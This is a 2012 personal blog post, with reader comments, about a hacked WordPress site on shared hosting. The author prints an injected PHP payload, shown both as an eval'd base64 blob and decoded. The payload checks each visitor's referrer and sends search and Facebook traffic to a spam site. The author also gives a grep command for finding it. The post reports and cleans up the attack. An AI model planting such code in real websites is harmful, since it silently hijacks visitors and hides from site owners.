April 2012
M T W T F S S
« Mar   Jul »
 1
2345678
9101112131415
16171819202122
23242526272829
30  

Archives

Damn you Hackers!!! Go to Hell!!!

So today, I noticed my another hack that’s been installed on my machine. I have to say ever since my move to GoDaddy.com, my site has been hacked over and over again. This is number #3. The reason why I posted about this one is because it is actually pretty interesting and finding what was done was like a mystery. So let me tell you a quick story.

So this evening I was trying to figure out how to get my project 365 page to post automatically to my website. This is when I first noticed a slowdown and issue when I am using the debugger from Facebook. At first I thought it was the wordpress plug in, but it occasionally works. I got everything ready, and posted my first auto post and strange things started to happen.

As I stated, everything looked normal at first until I click on the links provided by Facebook. When I click on the Facebook link to my website, it goes to some spam site. At first I thought it was the .htaccess hack that was I received a while back, but that is not the case. Then I thought maybe it was a DNS hack. That was also not the case, finally, I found the following in all my .php files on my web server.

It uses eval command and nested with base64_decode the following block of code.

DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhl
YWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVS
RVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICgh
c3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Ig
c3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0
cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJp
c3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQu
bHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5k
ZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgi
L2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlz
cGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3Ry
aXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNl
bGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ

it is quite clever. It is encoded and people may easily over look it, but when you decode the text this is what you get

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER[‘HTTP_REFERER’];
$uag=$_SERVER[‘HTTP_USER_AGENT’];
if ($uag) {
if (!stristr($uag,”MSIE 7.0″)){
if (stristr($referer,”yahoo”) or stristr($referer,”bing”) or stristr($referer,”rambler”) or stristr($referer,”gogo”) or stristr($referer,”live.com”)or stristr($referer,”aport”) or stristr($referer,”nigma”) or stristr($referer,”webalta”) or stristr($referer,”begun.ru”) or stristr($referer,”stumbleupon.com”) or stristr($referer,”bit.ly”) or stristr($referer,”tinyurl.com”) or preg_match(“/yandex\.ru\/yandsearch\?(.*?)\&lr\=/”,$referer) or preg_match (“/google\.(.*?)\/url\?sa/”,$referer) or stristr($referer,”myspace.com”) or stristr($referer,”facebook.com”) or stristr($referer,”aol.com”)) {
if (!stristr($referer,”cache”) or !stristr($referer,”inurl”)){
header(“Location: http://minkof.sellclassics.com/”);
exit();
}
}
}
}
}

Tricky huh?

So well… solution? remove all code in all .php files and with a little help from “grep” I was able to locate all the bad codes.

grep -H -r ‘eval(base64_decode’ ./

So, Go To Hell You Punk Hackers!!! I hope you guys get busted and become someone’s bitch in prison.

4 comments to Damn you Hackers!!! Go to Hell!!!

  • Rebecca

    Wow that’s scary! Are you going to change to a different host? I hope my website never gets hacked!

  • I am on such a good deal with GoDaddy right now, it is very hard for me to change. I will ride this out until the end of my current contract and move host. Meanwhile, I got to put my degree to some use, right?

  • Kim

    thank you SO much for posting this. The same thing has been happening to my website; only on facebook. I am technically challenged so I need to forward your advice to someone with some knowledge. I do appreciate you posting it though.

  • My advice is to change your password ASAP to your blog account and then start looking for the bad scripts. Your hosting service may have a way to see what files have been changed. It is only on facebook, it is probably exactly the same problem that I had.

Leave a Reply